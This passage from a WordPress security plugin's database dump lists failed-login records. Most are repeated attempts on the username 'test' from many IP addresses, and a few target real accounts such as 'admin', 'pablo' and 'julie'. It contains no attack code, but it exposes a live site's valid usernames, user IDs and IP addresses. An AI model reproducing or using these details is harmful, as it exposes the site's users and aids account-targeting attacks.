(103290, 1499523601.796684, 1, 'loginFailInvalidUsername', 'test', 0, 1331095837, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103291, 1499523603.056653, 1, 'loginFailInvalidUsername', 'test', 0, 1331095837, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103292, 1499524789.225753, 1, 'loginFailInvalidUsername', 'test', 0, 1549948000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103293, 1499524790.581601, 1, 'loginFailInvalidUsername', 'test', 0, 1549948000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103294, 1499526779.565656, 1, 'loginFailValidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.01.48 (KHTML, like Gecko) Chrome/57.4.9071.4709 Safari/533.31'),
(103295, 1499528794.644551, 1, 'loginFailInvalidUsername', 'test', 0, 1887831582, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103296, 1499530643.595914, 1, 'loginFailInvalidUsername', 'test', 0, 3413305865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103297, 1499530644.758703, 1, 'loginFailInvalidUsername', 'test', 0, 3413305865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103298, 1499532760.028203, 1, 'loginFailInvalidUsername', 'test', 0, 762555418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103299, 1499532761.875591, 1, 'loginFailInvalidUsername', 'test', 0, 762555418, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103300, 1499535206.976097, 1, 'loginFailInvalidUsername', 'test', 0, 1394954292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103301, 1499535208.004560, 1, 'loginFailInvalidUsername', 'test', 0, 1394954292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103302, 1499535689.566235, 1, 'loginFailInvalidUsername', 'test', 0, 1300171228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103303, 1499535690.645707, 1, 'loginFailInvalidUsername', 'test', 0, 1300171228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103304, 1499535904.246916, 1, 'loginFailInvalidUsername', 'test', 0, 3360902085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103305, 1499535905.864084, 1, 'loginFailInvalidUsername', 'test', 0, 3360902085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103306, 1499535917.697184, 1, 'loginFailInvalidUsername', 'test', 0, 2091416540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103307, 1499535919.487212, 1, 'loginFailInvalidUsername', 'test', 0, 2091416540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103308, 1499537558.539584, 1, 'loginFailInvalidUsername', 'test', 0, 1993567403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103309, 1499537560.126566, 1, 'loginFailInvalidUsername', 'test', 0, 1993567403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103310, 1499539703.195723, 1, 'loginFailInvalidUsername', 'test', 0, 763103202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103311, 1499539704.736229, 1, 'loginFailInvalidUsername', 'test', 0, 763103202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103312, 1499543809.526524, 1, 'loginFailInvalidUsername', 'test', 0, 2588279925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103313, 1499543811.098952, 1, 'loginFailInvalidUsername', 'test', 0, 2588279925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103314, 1499547610.166144, 1, 'loginFailInvalidUsername', 'test', 0, 3147442234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103315, 1499547611.622756, 1, 'loginFailInvalidUsername', 'test', 0, 3147442234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103316, 1499549078.075279, 1, 'loginFailInvalidUsername', 'test', 0, 1299092496, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103317, 1499549079.251014, 1, 'loginFailInvalidUsername', 'test', 0, 1299092496, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103318, 1499552960.505000, 1, 'loginFailInvalidUsername', 'test', 0, 1569731776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103319, 1499552961.619053, 1, 'loginFailInvalidUsername', 'test', 0, 1569731776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103320, 1499554670.305278, 1, 'loginFailInvalidUsername', 'test', 0, 3170051237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103321, 1499554671.355316, 1, 'loginFailInvalidUsername', 'test', 0, 3170051237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103322, 1499555632.330522, 1, 'loginFailInvalidUsername', 'test', 0, 1776310817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103323, 1499556758.367867, 1, 'loginFailInvalidUsername', 'test', 0, 1781732063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103324, 1499556759.719230, 1, 'loginFailInvalidUsername', 'test', 0, 1781732063, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103325, 1499562086.603608, 1, 'loginFailInvalidUsername', 'test', 0, 1610237772, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103326, 1499563048.371684, 1, 'loginFailInvalidUsername', 'test', 0, 2971068426, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103327, 1499563702.849074, 1, 'loginFailInvalidUsername', 'test', 0, 831956932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103328, 1499563704.756509, 1, 'loginFailInvalidUsername', 'test', 0, 831956932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103329, 1499563766.326209, 1, 'loginFailInvalidUsername', 'test', 0, 3185090186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103330, 1499563767.619293, 1, 'loginFailInvalidUsername', 'test', 0, 3185090186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103331, 1499573766.276431, 1, 'loginFailInvalidUsername', 'test', 0, 2979847696, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103332, 1499575183.514124, 1, 'loginFailInvalidUsername', 'test', 0, 831604747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103333, 1499575185.259626, 1, 'loginFailInvalidUsername', 'test', 0, 831604747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103334, 1499575583.214086, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_21_79) AppleWebKit/531.73.20 (KHTML, like Gecko) Chrome/55.1.6147.1875 Safari/532.02 Edge/36.06978'),
(103335, 1499577831.380982, 1, 'loginFailInvalidUsername', 'test', 0, 2869229270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103336, 1499577833.305460, 1, 'loginFailInvalidUsername', 'test', 0, 2869229270, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103337, 1499579491.717902, 1, 'loginFailInvalidUsername', 'test', 0, 16883149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103338, 1499579723.264150, 1, 'loginFailInvalidUsername', 'test', 0, 837087165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103339, 1499579892.018430, 1, 'loginFailInvalidUsername', 'test', 0, 3200584913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103340, 1499583850.617238, 1, 'loginFailInvalidUsername', 'test', 0, 3197645454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103341, 1499583964.917623, 1, 'loginFailInvalidUsername', 'test', 0, 86730617, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103342, 1499584482.569817, 1, 'loginFailInvalidUsername', 'test', 0, 1185626759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103343, 1499584483.759941, 1, 'loginFailInvalidUsername', 'test', 0, 1185626759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103344, 1499585556.430262, 1, 'loginFailInvalidUsername', 'test', 0, 1231956485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103345, 1499585557.695046, 1, 'loginFailInvalidUsername', 'test', 0, 1231956485, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103346, 1499585833.406722, 1, 'loginFailInvalidUsername', 'test', 0, 1824959805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103347, 1499585835.345684, 1, 'loginFailInvalidUsername', 'test', 0, 1824959805, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103348, 1499593406.993900, 1, 'loginFailInvalidUsername', 'test', 0, 1443625125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103349, 1499593408.060207, 1, 'loginFailInvalidUsername', 'test', 0, 1443625125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103350, 1499593460.588497, 1, 'loginFailInvalidUsername', 'test', 0, 1345377155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103351, 1499593461.619595, 1, 'loginFailInvalidUsername', 'test', 0, 1345377155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103352, 1499594484.143027, 1, 'loginFailInvalidUsername', 'test', 0, 1409380298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103353, 1499594485.180767, 1, 'loginFailInvalidUsername', 'test', 0, 1409380298, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103354, 1499595946.751296, 1, 'loginFailInvalidUsername', 'test', 0, 3163511040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103355, 1499595947.784100, 1, 'loginFailInvalidUsername', 'test', 0, 3163511040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103356, 1499597887.657514, 1, 'loginFailInvalidUsername', 'test', 0, 1976123259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103357, 1499597889.133480, 1, 'loginFailInvalidUsername', 'test', 0, 1976123259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103358, 1499599067.474067, 1, 'loginFailInvalidUsername', 'test', 0, 3417436567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103359, 1499599069.050666, 1, 'loginFailInvalidUsername', 'test', 0, 3417436567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103360, 1499600574.181319, 1, 'loginFailInvalidUsername', 'test', 0, 1892043913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103361, 1499600576.360942, 1, 'loginFailInvalidUsername', 'test', 0, 1892043913, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103362, 1499601915.268594, 1, 'loginFailInvalidUsername', 'test', 0, 2630499626, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103363, 1499601916.436772, 1, 'loginFailInvalidUsername', 'test', 0, 2630499626, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103364, 1499602770.704167, 1, 'loginFailInvalidUsername', 'test', 0, 3319472730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103365, 1499602773.198091, 1, 'loginFailInvalidUsername', 'test', 0, 3319472730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103366, 1499604991.522628, 1, 'loginFailInvalidUsername', 'test', 0, 1486762851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103367, 1499604992.799480, 1, 'loginFailInvalidUsername', 'test', 0, 1486762851, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103368, 1499605448.216789, 1, 'loginFailInvalidUsername', 'test', 0, 3057106319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103369, 1499605449.761862, 1, 'loginFailInvalidUsername', 'test', 0, 3057106319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103370, 1499612233.343273, 1, 'loginFailInvalidUsername', 'test', 0, 3177859328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103371, 1499612235.663835, 1, 'loginFailInvalidUsername', 'test', 0, 3177859328, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103372, 1499612486.942194, 1, 'loginFailInvalidUsername', 'test', 0, 1451197307, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103373, 1499612487.922832, 1, 'loginFailInvalidUsername', 'test', 0, 1451197307, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103374, 1499615827.967903, 1, 'loginFailInvalidUsername', 'test', 0, 1382268166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103375, 1499615828.947546, 1, 'loginFailInvalidUsername', 'test', 0, 1382268166, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103376, 1499615831.746367, 1, 'loginFailInvalidUsername', 'test', 0, 3136471353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103377, 1499615833.123901, 1, 'loginFailInvalidUsername', 'test', 0, 3136471353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103378, 1499616447.107801, 1, 'loginFailInvalidUsername', 'test', 0, 3128213840, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103379, 1499616448.498361, 1, 'loginFailInvalidUsername', 'test', 0, 3128213840, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103380, 1499616538.492877, 1, 'loginFailInvalidUsername', 'test', 0, 1729372066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103381, 1499616540.302146, 1, 'loginFailInvalidUsername', 'test', 0, 1729372066, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103382, 1499617900.129442, 1, 'loginFailInvalidUsername', 'test', 0, 1176445815, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103383, 1499617901.317644, 1, 'loginFailInvalidUsername', 'test', 0, 1176445815, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103384, 1499621977.489121, 1, 'loginFailInvalidUsername', 'test', 0, 1393864342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103385, 1499621978.548352, 1, 'loginFailInvalidUsername', 'test', 0, 1393864342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103386, 1499623231.079960, 1, 'loginFailInvalidUsername', 'test', 0, 779420885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103387, 1499626531.843392, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.94.47 (KHTML, like Gecko) Chrome/57.5.0669.5931 Safari/534.65 OPR/40.6.1481.6654'),
(103388, 1499628203.835511, 1, 'loginFailInvalidUsername', 'test', 0, 3144234785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103389, 1499628205.262855, 1, 'loginFailInvalidUsername', 'test', 0, 3144234785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103390, 1499629816.061521, 1, 'loginFailInvalidUsername', 'test', 0, 3315580339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103391, 1499629817.736908, 1, 'loginFailInvalidUsername', 'test', 0, 3315580339, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103392, 1499632033.555609, 1, 'loginFailInvalidUsername', 'test', 0, 92696206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103393, 1499632034.587579, 1, 'loginFailInvalidUsername', 'test', 0, 92696206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103394, 1499632428.526891, 1, 'loginFailInvalidUsername', 'test', 0, 1612157886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103395, 1499632429.614496, 1, 'loginFailInvalidUsername', 'test', 0, 1612157886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103396, 1499636760.554689, 1, 'loginFailInvalidUsername', 'test', 0, 702968555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103397, 1499636761.833784, 1, 'loginFailInvalidUsername', 'test', 0, 702968555, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103398, 1499637385.597415, 1, 'loginFailInvalidUsername', 'test', 0, 3065221390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103399, 1499637386.944260, 1, 'loginFailInvalidUsername', 'test', 0, 3065221390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103400, 1499638341.423933, 1, 'loginFailInvalidUsername', 'test', 0, 736129142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103401, 1499638343.312626, 1, 'loginFailInvalidUsername', 'test', 0, 736129142, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103402, 1499638406.898717, 1, 'loginFailInvalidUsername', 'test', 0, 1314156440, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103403, 1499639552.545447, 1, 'loginFailInvalidUsername', 'test', 0, 1579330244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103404, 1499639553.605573, 1, 'loginFailInvalidUsername', 'test', 0, 1579330244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103405, 1499639880.151582, 1, 'loginFailInvalidUsername', 'test', 0, 1296128796, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103406, 1499639881.145440, 1, 'loginFailInvalidUsername', 'test', 0, 1296128796, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103407, 1499640303.412187, 1, 'loginFailInvalidUsername', 'test', 0, 1229694860, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103408, 1499640304.567864, 1, 'loginFailInvalidUsername', 'test', 0, 1229694860, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103409, 1499647387.227329, 1, 'loginFailInvalidUsername', 'test', 0, 1430305916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103410, 1499647388.434162, 1, 'loginFailInvalidUsername', 'test', 0, 1430305916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103411, 1499648689.284682, 1, 'loginFailInvalidUsername', 'test', 0, 2830446697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103412, 1499652619.401777, 1, 'loginFailInvalidUsername', 'test', 0, 831760205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103413, 1499652621.580714, 1, 'loginFailInvalidUsername', 'test', 0, 831760205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103414, 1499653013.712699, 1, 'loginFailInvalidUsername', 'test', 0, 3032370800, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103415, 1499654903.534397, 1, 'loginFailInvalidUsername', 'test', 0, 2047078917, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103416, 1499655683.703146, 1, 'loginFailInvalidUsername', 'test', 0, 1743248074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103417, 1499655715.777957, 1, 'loginFailInvalidUsername', 'test', 0, 1287217583, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103418, 1499656486.798499, 1, 'loginFailInvalidUsername', 'test', 0, 1892904470, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103419, 1499661153.331904, 1, 'loginFailInvalidUsername', 'test', 0, 656427239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103420, 1499661154.626180, 1, 'loginFailInvalidUsername', 'test', 0, 656427239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103421, 1499662252.948001, 1, 'loginFailInvalidUsername', 'test', 0, 1951800347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103422, 1499662254.425107, 1, 'loginFailInvalidUsername', 'test', 0, 1951800347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103423, 1499662703.603610, 1, 'loginFailValidUsername', 'pablo', 3, 3149755246, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(103424, 1499662703.603651, 1, 'loginFailValidUsername', 'julie', 2, 3149755246, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(103425, 1499668161.410145, 1, 'loginFailInvalidUsername', 'test', 0, 1039610075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103426, 1499668163.170464, 1, 'loginFailInvalidUsername', 'test', 0, 1039610075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103427, 1499670007.681688, 1, 'loginFailInvalidUsername', 'test', 0, 36889934, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103428, 1499670914.661032, 1, 'loginFailInvalidUsername', 'test', 0, 3419742137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103429, 1499670916.913717, 1, 'loginFailInvalidUsername', 'test', 0, 3419742137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103430, 1499671004.256151, 1, 'loginFailInvalidUsername', 'test', 0, 1394505225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103431, 1499671005.342660, 1, 'loginFailInvalidUsername', 'test', 0, 1394505225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103432, 1499671639.135251, 1, 'loginFailInvalidUsername', 'test', 0, 763312130, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103433, 1499671640.398742, 1, 'loginFailInvalidUsername', 'test', 0, 763312130, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103434, 1499676169.368366, 1, 'loginFailInvalidUsername', 'test', 0, 1892183541, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103435, 1499676170.983915, 1, 'loginFailInvalidUsername', 'test', 0, 1892183541, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103436, 1499676833.444815, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.07.50 (KHTML, like Gecko) Version/4.6.1 Safari/532.14'),
(103437, 1499678271.116528, 1, 'loginFailInvalidUsername', 'test', 0, 1833786223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103438, 1499678272.132377, 1, 'loginFailInvalidUsername', 'test', 0, 1833786223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103439, 1499680319.956256, 1, 'loginFailInvalidUsername', 'test', 0, 1948279417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103440, 1499680321.547555, 1, 'loginFailInvalidUsername', 'test', 0, 1948279417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
